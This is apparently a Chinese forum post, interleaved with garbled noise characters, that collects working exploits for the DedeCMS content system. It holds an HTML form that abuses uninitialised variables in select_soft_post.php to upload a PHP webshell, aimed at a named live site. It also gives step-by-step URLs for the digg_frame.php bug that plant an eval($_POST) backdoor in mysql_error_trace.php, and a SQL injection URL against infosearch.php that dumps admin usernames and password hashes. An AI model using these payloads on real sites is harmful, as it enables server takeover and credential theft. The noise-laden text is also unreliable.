/ h. L' w0 k% Q) p& o1 _( y1 a- P4 y* a
, q! i( i$ z8 {1 E
' ^* E: M" L" g) _3 C* z
5 j% V- [, e+ o' [) X" d$ ]/ K
& t- b0 P7 z  Z. j. @0 n2 x
# u3 Z! F1 M( B: p7 g+ s3 T

3 w# j2 z& x# a, {1 q
, d# Q* G9 C6 }7 o. R
' d) e. R/ N5 ^, D# [; r- g8 ~! \+ f2 v+ h! E4 g
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞0 y4 U8 R4 S4 e- G4 b
<html>, W  }7 G! R  P  t6 i5 f; k2 k
<head>
, {% q8 ]* f9 W' {<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>" P7 Q! N8 B9 W2 l0 N
</head>
2 @: l! c: z% {  n- t' i" M5 `: p. m7 V0 ~<body style="FONT-SIZE: 9pt">7 R6 y8 J3 `, h
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
  v2 N" @# _) q( n<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
+ _( z, y- M; u) \9 R" Y3 `  s8 n<input type='hidden' name='activepath' value='/data/cache/' />
$ O$ m! p3 e$ \9 A- L/ K<input type='hidden' name='cfg_basedir' value='../../' />
  o" F' R2 Z. o2 K1 m7 N5 _<input type='hidden' name='cfg_imgtype' value='php' />% R. j) l, U/ ]- W
<input type='hidden' name='cfg_not_allowall' value='txt' />& U  l2 h' C: H1 ^6 n: Y
<input type='hidden' name='cfg_softtype' value='php' />( Y  G, h' s& p. I
<input type='hidden' name='cfg_mediatype' value='php' />
, J9 m  y3 d$ B, z+ Z$ S& U/ L<input type='hidden' name='f' value='form1.enclosure' />
0 B6 l: n2 I9 O/ _! y<input type='hidden' name='job' value='upload' />
5 S& k; }2 I7 B, f0 o<input type='hidden' name='newname' value='fly.php' />
$ }2 E) f/ R5 b9 z9 N9 HSelect U Shell <input type='file' name='uploadfile' size='25' />! L% ]. Q+ I* R1 I- O( F
<input type='submit' name='sb1' value='确定' />  d6 _# Y0 z5 Z  `5 M. m
</form>
: P/ B* s$ A5 s* ^( _2 g2 j' `<br />It's just a exp for the bug of Dedecms V55...<br />. J4 U& |, h( |, k
Need register_globals = on...<br />' h6 @4 T1 ]! n: b1 r
Fun the game,get a webshell at /data/cache/fly.php...<br />
4 }- Q5 V- h7 [7 e' c4 E</body>
9 K$ U0 X, ?$ `: j8 ~2 \0 X+ X3 }</html>' d  l# J# _8 r8 I

- g- [" I$ Q2 {' I+ h" X
3 o' `" j) B( B" @( X; M( m5 }$ t; H& Z/ i
, R6 M) I  e, K$ f1 X

2 }0 v1 v; S3 ?
8 R" Y' K* I1 a) x5 l# B0 B3 k
! }6 B7 K$ j, c/ i; A! r* j+ R3 h8 s1 K

) U3 [. G7 ?% W+ ~( T2 L# z
& |9 c" w8 i7 u$ A4 B% S# ^6 r织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
7 m; I  K' \2 f& p7 r1 q. k% U' A利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
* v/ n, m+ Y7 J8 C$ X& l1. 访问网址:
" I( s1 K% {7 \4 ^
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
" Y. P  ?  [  p可看见错误信息- R0 u8 ]6 k4 \; M; l
# k8 w! t8 h7 i  Z7 g* X6 Z9 z

9 U, r( s5 E( G+ T: _2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。' u" X" X: u/ J. H. `4 T: J
int(3) Error: Illegal double '1024e1024' value found during parsing
) z. U- o7 ?! HError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>' F# L8 V$ j0 Q, {% f  D* q6 J

, s( j. q% T" W' p! y4 A; _7 @0 a. r" S* B+ ?' r
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是# I  R0 E  K9 l, f
0 D2 n) v: v+ {9 z5 K' V6 ?

- u7 J/ e7 h; Q# W+ k5 h% {2 \6 v1 l<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>! w  ]( D+ }5 j' r% L1 H# Z
0 h. C- p) G+ f6 h* m

' |( u3 @4 i% j+ ?' s  }按确定后的看到第2步骤的信息表示文件木马上传成功.2 a+ u/ j/ h9 [# k! N
" T4 b; I" \- D: x& s3 |2 J! A2 ]" X

9 h7 [/ z# x3 [7 j/ n! f9 `9 h- r: ^6 |2 w
) d( ?3 ]; O) k
7 D% c( n; r0 {0 A7 g# z
, D2 U( N+ U1 X5 _
" ~: ]6 f' r5 z7 Z

5 [- ^4 ]$ K6 ?! x& r
4 x9 Y9 B( R3 l$ X
' P- o1 h% w7 o2 V9 i7 w: y2 s+ o. L6 J, {# }1 i9 R5 `
, B/ h, y  }0 a  A6 P
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
7 w1 a1 I8 N; N. A, mhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表